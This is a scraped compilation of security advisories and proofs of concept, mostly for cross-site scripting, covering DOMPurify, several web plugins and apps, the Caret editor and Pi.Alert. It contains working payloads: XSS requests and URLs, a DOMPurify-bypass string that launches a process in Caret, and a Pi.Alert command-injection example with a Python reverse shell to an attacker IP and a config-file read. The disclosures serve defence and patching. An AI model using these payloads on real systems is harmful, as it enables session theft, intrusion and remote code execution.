dompurify prior to version 2.2.3 is vulnerable to a cross-site scripting problem caused by nested headlines.

**dompurify vulnerable to Cross-site Scripting**

Moderate severity GitHub Reviewed Published Jan 11, 2023

GHSA-h6p3-p4vx-wr8q: dompurify vulnerable to Cross-site Scripting

dompurify prior to version 2.2.2 is vulnerable to cross-site scripting when converting from SVG namespace.

GHSA-pgjv-jrg2-gq3v: dompurify vulnerable to Cross-site Scripting

A vulnerability classified as problematic has been found in zerochplus. This affects the function PrintResList of the file test/mordor/thread.res.pl. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is 9ddf9ecca8565341d8d26a3b2f64540bde4fa273. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218007.

@@ -257,6 +257,15 @@ sub PrintResList

$log = $Logger\->Get($logsize - 1 + $i - $lastnum);

@logs = split(/<>/,$log,-1) if (defined $log);

  

foreach (0 .. $#logs) {

$logs\[$\_\] =~ s/\[\\x0d\\x0a\\0\]//g;

$logs\[$\_\] =~ s/&/&amp;/g;

$logs\[$\_\] =~ s/"/&quot;/g;

$logs\[$\_\] =~ s/'/&#39;/g;

$logs\[$\_\] =~ s/</&lt;/g;

$logs\[$\_\] =~ s/\>/&gt;/g;

}

  

$Page\->Print("<tr><td class=\\"Response\\" valign=top>");

  

# レス削除権による表示抑制

CVE-2013-10010: パスワード抜きのXSS脆弱性対策 · zerochplus/zerochplus@9ddf9ec

WordPress Royal Elementor add-ons versions 1.3.59 and below suffer from cross site request forgery, insufficient access control, cross site scripting vulnerabilities.

On December 23, 2022, the Wordfence Threat Intelligence team initiated the responsible disclosure process for a set of 11 vulnerabilities in Royal Elementor Addons, a WordPress plugin with over 100,000 installations. The plugin developers responded on December 26, and we sent over the full disclosure that day.

We released a firewall rule protecting against these vulnerabilities to Wordfence Premium, Care, and Response customers on December 23, 2022. Sites still running the free version of Wordfence will receive the same protection 30 days later, on January 22, 2023.

While none of the vulnerabilities were critical, several of them could have been used by any authenticated user to modify content, disable plugins, or even temporarily take down the site in some circumstances. Additionally one of the patched vulnerabilities was a Reflected Cross-Site Scripting vulnerability which could have been used to take over the site if an attacker was able to trick an administrator into performing an action, such as clicking a link.

This email content has also been published on our blog and you're welcome to post a comment there if you'd like to join the conversation.  Or you can read the full post in this email.

Vulnerability Details

The primary set of issues we found with Royal Elementor Addons was due to a lack of access control and nonce checks on various AJAX actions in the plugin.

Description: Insufficient Access Control to Theme Activation

Affected Plugin: Royal Elementor Addons

Plugin Slug: royal-elementor-addons

Affected Versions: <= 1.3.59

CVE ID: CVE-2022-4700

CVSS Score: 5.4 (Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Researcher/s: Ramuel Gall

Fully Patched Version: 1.3.60

Royal Elementor Addons has an option to quickly activate the recommended Royal Elementor Kit theme. Unfortunately, this is performed via an AJAX function, wpr_activate_required_theme, which did not perform capability or nonce checks, or even check if the theme was installed on the site. This meant that any logged-in user, such as a subscriber, could change a vulnerable site’s theme. If the Royal Elementor Kit theme was not installed on the site, this would result in a loss of availability as the site would fail to load and instead display an error message.

Description: Insufficient Access Control to Plugin Deactivation 

Affected Plugin: Royal Elementor Addons

Plugin Slug: royal-elementor-addons

Affected Versions: <= 1.3.59

CVE ID: CVE-2022-4702

CVSS Score: 5.4 (Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Researcher/s: Ramuel Gall

Fully Patched Version: 1.3.60

Royal Elementor Addons has an option to revert the site to a “compatible” state for imported templates via the wpr_fix_royal_compatibility AJAX function. This involves deactivating all but a short list of hard-coded plugins. As the function did not use capability or nonce checks, this means that any authenticated user could deactivate plugins necessary for site functionality as well as any security plugins that do not specifically block this action. This could cause the site to become unavailable or vulnerable to additional exploits.

Description: Insufficient Access Control to Template Import

Affected Plugin: Royal Elementor Addons

Plugin Slug: royal-elementor-addons

Affected Versions: <= 1.3.59

CVE ID: CVE-2022-4704

CVSS Score: 5.4 (Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Researcher/s: Ramuel Gall

Fully Patched Version: 1.3.60

Royal Elementor Addons allows importing preset templates via the wpr_import_templates_kit AJAX function. Vulnerable versions of the plugin do not include capability or nonce check for this function, so any authenticated user could import templates, potentially overwriting any existing templates.

Description: Insufficient Access Control to Plugin Activation

Affected Plugin: Royal Elementor Addons

Plugin Slug: royal-elementor-addons

Affected Versions: <= 1.3.59

CVE ID: CVE-2022-4701

CVSS Score: 4.3 (Low)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Researcher/s: Ramuel Gall

Fully Patched Version: 1.3.60

Royal Elementor Addons has an option to activate the 'contact-form-7', 'media-library-assistant', or 'woocommerce' plugins if they are installed on the site via the wpr_activate_required_plugins AJAX action, and this functionality was available to any logged-in user. Fortunately the impact of this vulnerability is quite minimal as it would only allow an attacker to activate three select plugins.

Description: Insufficient Access Control to Import Deletion

Affected Plugin: Royal Elementor Addons

Plugin Slug: royal-elementor-addons

Affected Versions: <= 1.3.59

CVE ID: CVE-2022-4703

CVSS Score: 4.3 (Low)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Researcher/s: Ramuel Gall

Fully Patched Version: 1.3.60

Royal Elementor Addons has an AJAX action, wpr_reset_previous_import, used to delete previously imported content when importing new content. However, since it is accessible to any authenticated user, this could be used to delete imported content without importing new content, potentially resulting in site availability issues.

Description: Insufficient Access Control to Template Activation

Affected Plugin: Royal Elementor Addons

Plugin Slug: royal-elementor-addons

Affected Versions: <= 1.3.59

CVE ID: CVE-2022-4705

CVSS Score: 4.3 (Low)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Researcher/s: Ramuel Gall

Fully Patched Version: 1.3.60

Royal Elementor Addons uses the wpr_final_settings_setup AJAX action to finalize activation of preset site configuration templates, which can be chosen and imported via a separate action. As with the other vulnerabilities recorded here, any authenticated user could access this functionality, though the impact of this vulnerability was lower.

Description: Insufficient Access Control to Menu Settings Update

Affected Plugin: Royal Elementor Addons

Plugin Slug: royal-elementor-addons

Affected Versions: <= 1.3.59

CVE ID: CVE-2022-4711

CVSS Score: 4.3 (Low)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Researcher/s: Ramuel Gall

Fully Patched Version: 1.3.60

Royal Elementor Addons uses the wpr_save_mega_menu_settings AJAX action to update mega menu settings. As with the other vulnerabilities we found, this action called a function that did not include a capability check or a nonce check, so any authenticated user could update menu settings.

Description: Insufficient Access Control to Template Conditions Modification

Affected Plugin: Royal Elementor Addons

Plugin Slug: royal-elementor-addons

Affected Versions: <= 1.3.59

CVE ID: CVE-2022-4708

CVSS Score: 4.3 (Low)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Researcher/s: Ramuel Gall

Fully Patched Version: 1.3.60

Royal Elementor Addons uses the wpr_save_template_conditions AJAX action to save template conditions, determining when a given template will be displayed and used. The action called a function that was accessible to any authenticated user.

Description: Insufficient Access Control to Template Kit Import

Affected Plugin: Royal Elementor Addons

Plugin Slug: royal-elementor-addons

Affected Versions: <= 1.3.59

CVE ID: CVE-2022-4709

CVSS Score: 4.3 (Low)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Researcher/s: Ramuel Gall

Fully Patched Version: 1.3.60

Royal Elementor Addons uses the wpr_import_library_template AJAX action to import and activate templates from the plugin developers’ template library. As with other vulnerabilities reported here, the action called a function that did not include a capability or nonce check, allowing any authenticated user to access it.

The final vulnerabilities we found did not exactly fit the pattern of the others - one was a lower-severity Cross-Site Request Forgery(CSRF) and the other, a higher-severity reflected Cross-Site Scripting(XSS).

Description: Cross-Site Request Forgery to Menu Template creation

Affected Plugin: Royal Elementor Addons

Plugin Slug: royal-elementor-addons

Affected Versions: <= 1.3.59

CVE ID: CVE-2022-4707

CVSS Score: 4.3 (Low)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Researcher/s: Ramuel Gall

Fully Patched Version: 1.3.60

Unlike the other AJAX actions we’ve mentioned so far, wpr_create_mega_menu_template, which is used to create new menu templates, did include access control. It was, however, still lacking a nonce check, so an attacker could trick a logged-in administrator into performing an action that would result in a menu template being created.

Description: Reflected Cross-Site Scripting

Affected Plugin: Royal Elementor Addons

Plugin Slug: royal-elementor-addons

Affected Versions: <= 1.3.59

CVE ID: CVE-2022-4710

CVSS Score: 6.1 (Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Researcher/s: Ramuel Gall

Fully Patched Version: 1.3.60

Unlike all of the other vulnerabilities mentioned above, reflected cross-site scripting(XSS) can be used by an attacker to completely take over a website if they can trick a logged-in administrator into performing an action, such as clicking a link, by performing actions as that administrator, such as adding a new malicious administrator, or inserting a backdoor into a plugin or theme file.

Additionally, unauthenticated users could also be targeted by this to redirect them to a malicious website or perform actions in their browsers. In this case, the data_fetch function failed to escape the wpr_ajax_search_link_target parameter used to return search results. Note that all Wordfence users, including Wordfence free users, are protected against exploits targeting this rule by the Wordfence firewall’s built-in Cross-Site Scripting protection.

Timeline

December 23, 2022 - We release a firewall rule protecting Wordfence Premium, Care, and Response customers and reach out to the plugin developer

December 26, 2023 - The plugin developer responds

December 29, 2023 - A patched version, 1.3.60, is released

January 22, 2023 - Firewall rule becomes available to Wordfence Free users

Conclusion

In today’s article, we covered a set of 11 vulnerabilities in the Royal Elementor Addons plugin. While none are critical, several can have severe consequences under certain circumstances.

The Wordfence firewall protects Wordfence Premium, Care, and Response users from these vulnerabilities and Wordfence Free users will receive protection on January 22, 2023 Nonetheless, we strongly recommend updating to the latest version of the plugin, which is 1.3.60 at the time of this writing, as soon as possible.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. 

If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance. If you have any friends or colleagues who are using this plugin, please share this announcement with them and encourage them to update to the latest patched version of Royal Elementor Addons as soon as possible.

If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence Community Edition leaderboard.

WordPress Royal Elementor 1.3.59 XSS / CSRF / Insufficient Access Controls

Online Food Ordering System version 2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Online Food Ordering System v2 - Stored Cross Site Scripting (XSS)# Date: 01/11/2023# Exploit Author: Alaeddin Berksoy# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code# Version: 2.0 # Tested on: Macos / XAMPPPOST /fos/admin/ajax.php?action=save_category HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------212007370016574149261512413130Content-Length: 322Origin: http://localhostConnection: closeReferer: http://localhost/fos/admin/index.php?page=categoriesCookie: language=en; welcomebanner_status=dismiss; continueCode=LoPJXWEAqruytmUYHrT4FDiBZikOH1Vh8Zh7JHvLtppI9VCvXHEYd7ywQ1B5; cookieconsent_status=dismiss; PHPSESSID=eje1menuonpvjtfbl2ri965btkSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------212007370016574149261512413130Content-Disposition: form-data; name="id"-----------------------------212007370016574149261512413130Content-Disposition: form-data; name="name"<img src onerror=alert(document.cookie);>-----------------------------212007370016574149261512413130--

Online Food Ordering System 2.0 Cross Site Scripting

Tiki Wiki CMS Groupware version 25.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : tiki.org                                                                   ││  Vendor   : Tiki Software Community Association                                        ││  Software : Tiki Wiki CMS Groupware 25.0                                               ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'objectId' is vulnerable to XSSPath: /25x/tiki-ajax_services.phphttps://demo.tiki.org/25x/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=%ec%98%a4%eb%8a%98%ec%9d%98%20%eb%82%a0%ec%94%a8%7d%7dfz6no%3cscript%3ealert(1)%3c%2fscript%3ewwyvb[-] Done

Tiki Wiki CMS Groupware 25.0 Cross Site Scripting

A vulnerability has been found in Newcomer1989 TSN-Ranksystem up to 1.2.6 and classified as problematic. This vulnerability affects the function getlog of the file webinterface/bot.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.2.7 is able to address this issue. The name of the patch is b3a3cd8efe2cd3bd3c5b3b7abf2fe80dbee51b77. It is recommended to upgrade the affected component. VDB-218002 is the identifier assigned to this vulnerability.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2018-25073: Release 1.2.7 · Newcomer1989/TSN-Ranksystem

Caret is vulnerable to an XSS attack when the user opens a crafted Markdown file when preview mode is enabled. This directly leads to client-side code execution.

CVE-2022-42967 | CVSS 7.5

JFrog Severity:high

Published 10 Jan. 2023 | Last updated 10 Jan. 2023

XSS in Caret markdown editor leads to remote code execution when viewing crafted Markdown files

Caret Editor

All versions are affected

This issue is caused due to insufficient validation of the document data, which is sent to the Electron renderer. Specifically, in the getMarkdownHtmlElement function in the file app.asar/extensions/Markdown/Markdown.js -

t.firstChild.innerHTML = DOMPurify.sanitize(r)

An older version of DOMPurify is used, which has known filtering bypasses (see below)

Opening a document with the following contents, **when preview mode is enabled**, leads to the immediate execution of an arbitrary process (in this case - Calculator) -

    <form><math><mtext></form><form><mglyph><style></math><img src
    onerror="try{ const {shell} = require('electron');
    shell.openExternal('file:C:/Windows/System32/calc.exe') }catch(e){alert(e)}">
    

Disable Caret's "Preview Mode"

NVD

CVE-2022-42967: Caret XSS RCE |

A vulnerability was found in backdrop-contrib Basic Cart. It has been classified as problematic. Affected is the function basic_cart_checkout_form_submit of the file basic_cart.cart.inc. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.x-1.1.1 is able to address this issue. The name of the patch is a10424ccd4b3b4b433cf33b73c1ad608b11890b4. It is recommended to upgrade the affected component. VDB-217950 is the identifier assigned to this vulnerability.

@@ -25,7 +25,7 @@ function basic\_cart\_admin\_content\_type() { '#description' => t('Please select the content types for which you wish to have the "Add to cart" option.'), );  
$form\['content\_type'\]\['types'\] = array( $form\['content\_type'\]\['basic\_cart\_content\_types'\] = array( '#title' => t('Content types'), '#type' => 'checkboxes', '#options' => $options, @@ -38,34 +38,34 @@ function basic\_cart\_admin\_content\_type() { '#description' => t('Here you can customize the mails sent to the site administrator and customer, after an order is placed.'), );  
$form\['messages'\]\['admin\_subject'\] = array( $form\['messages'\]\['basic\_cart\_admin\_subject'\] = array( '#title' => t('Subject'), '#type' => 'textfield', '#description' => t("Subject field for the administrator's email."), '#default\_value' => variable\_get('basic\_cart\_admin\_subject'), );  
$form\['messages'\]\['admin\_message'\] = array( $form\['messages'\]\['basic\_cart\_admin\_message'\] = array( '#title' => t('Admin email'), '#type' => 'textarea', '#description' => t('This email will be sent to the site administrator just after an order is placed. Availabale tokes: %CUSTOMER\_NAME, %CUSTOMER\_EMAIL, %CUSTOMER\_PHONE, %CUSTOMER\_ADDRESS, %CUSTOMER\_MESSAGE, %ORDER\_DETAILS'), '#default\_value' => variable\_get('basic\_cart\_admin\_message'), );  
$form\['messages'\]\['send\_user\_message'\] = array( $form\['messages'\]\['basic\_cart\_send\_user\_message'\] = array( '#title' => t('Send an email to the customer after an order is placed'), '#type' => 'checkbox', '#default\_value' => variable\_get('basic\_cart\_send\_user\_message'), );  
$form\['messages'\]\['user\_subject'\] = array( $form\['messages'\]\['basic\_cart\_user\_subject'\] = array( '#title' => t('Subject'), '#type' => 'textfield', '#description' => t("Subject field for the user's email."), '#default\_value' => variable\_get('basic\_cart\_user\_subject'), );  
$form\['messages'\]\['user\_message'\] = array( $form\['messages'\]\['basic\_cart\_user\_message'\] = array( '#title' => t('User email'), '#type' => 'textarea', '#description' => t('This email will be sent to the user just after an order is placed. Availabale tokes: %CUSTOMER\_NAME, %CUSTOMER\_EMAIL, %CUSTOMER\_PHONE, %CUSTOMER\_ADDRESS, %CUSTOMER\_MESSAGE, %ORDER\_DETAILS'), @@ -78,57 +78,19 @@ function basic\_cart\_admin\_content\_type() { '#description' => t('Here you can customize the thank you page.'), );  
$form\['thank\_you'\]\['thank\_you\_title'\] = array( $form\['thank\_you'\]\['basic\_cart\_thank\_you\_title'\] = array( '#title' => t('Title'), '#type' => 'textfield', '#description' => t('Thank you page title.'), '#default\_value' => variable\_get('basic\_cart\_thank\_you\_title'), );  
$form\['thank\_you'\]\['thank\_you\_message'\] = array( $form\['thank\_you'\]\['basic\_cart\_thank\_you\_message'\] = array( '#title' => t('Text'), '#type' => 'textarea', '#description' => t('Thank you page text.'), '#default\_value' => variable\_get('basic\_cart\_thank\_you\_message'), );  
$form\['save'\] = array( '#type' => 'submit', '#value' => t('Save configuration'), );  
return $form; }  
  
/\*\* \* Callback for the admin configuration page submit function \*/ function basic\_cart\_admin\_content\_type\_submit($form\_id, $form\_state) { $types = $form\_state\['values'\]\['types'\]; $selected\_types = array(); foreach ($types as $type) { if (!empty($type)) { $selected\_types\[\] = $type; } }  
// Content types. variable\_set('basic\_cart\_content\_types', $selected\_types);  
// Admin message. variable\_set('basic\_cart\_admin\_message', $form\_state\['values'\]\['admin\_message'\]); variable\_set('basic\_cart\_admin\_subject', $form\_state\['values'\]\['admin\_subject'\]);  
// User message. variable\_set('basic\_cart\_send\_user\_message', $form\_state\['values'\]\['send\_user\_message'\]); variable\_set('basic\_cart\_user\_message', $form\_state\['values'\]\['user\_message'\]); variable\_set('basic\_cart\_user\_subject', $form\_state\['values'\]\['user\_subject'\]);  
// Thank you message. variable\_set('basic\_cart\_thank\_you\_title', $form\_state\['values'\]\['thank\_you\_title'\]); variable\_set('basic\_cart\_thank\_you\_message', $form\_state\['values'\]\['thank\_you\_message'\]);  
// Message. drupal\_set\_message(t('The configuration options have been saved.')); return system\_settings\_form($form); }

CVE-2012-10004: XSS issue, drupal mail instead of mail system · backdrop-contrib/basic_cart@a10424c

The jokob-sk/Pi.Alert fork (before 22.12.20) of Pi.Alert allows Remote Code Execution via nmap_scan.php (scan parameter) OS Command Injection.

**Summary**

An OS Command injection vulnerability allows any unauthenticated user to execute arbitrary code on the server.

**Details**

The affected code can be found here:  
https://github.com/jokob-sk/Pi.Alert/blob/main/front/php/server/nmap\_scan.php  
As well as the corresponding leiweibau fork.  
Here is the CWE with more information on how the vulnerability works and can be fixed.  
https://cwe.mitre.org/data/definitions/78.html

Some other helpful links:  
https://cheatsheetseries.owasp.org/cheatsheets/OS\_Command\_Injection\_Defense\_Cheat\_Sheet.html  
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web\_Application\_Security\_Testing/07-Input\_Validation\_Testing/12-Testing\_for\_Command\_Injection  
https://owasp.org/www-community/attacks/Command\_Injection

**PoC**

Using the default configuration, click on any device and then navigate to the nmap tab. Click on one of the nmap buttons and intercept the request via Burp Proxy. Modify the request by adding a semi-colon and then whatever other command you want to run after the scan=.

scan=192.168.1.5&mode=fast

to

scan=;whoami&mode=fast

it will come back as www-data

another useful command is

scan=;cat ../../../config/pialert.conf&mode=fast  
  

Reverse shell via python (change the ip and port to match attacker machine):

scan=;python -c 'import socket,subprocess;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(("192.168.1.63",4444));subprocess.call(\["/bin/sh","-i"\],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'&mode=fast

Video of the POC (unlisted video):  
https://youtu.be/BR43Af5iykE

This same request can result in XSS as well but eh to that because un-authenticated internal only app.

**Impact**

An attacker with access to the pi.alert web UI would be able to run code on server.

Tag

#xss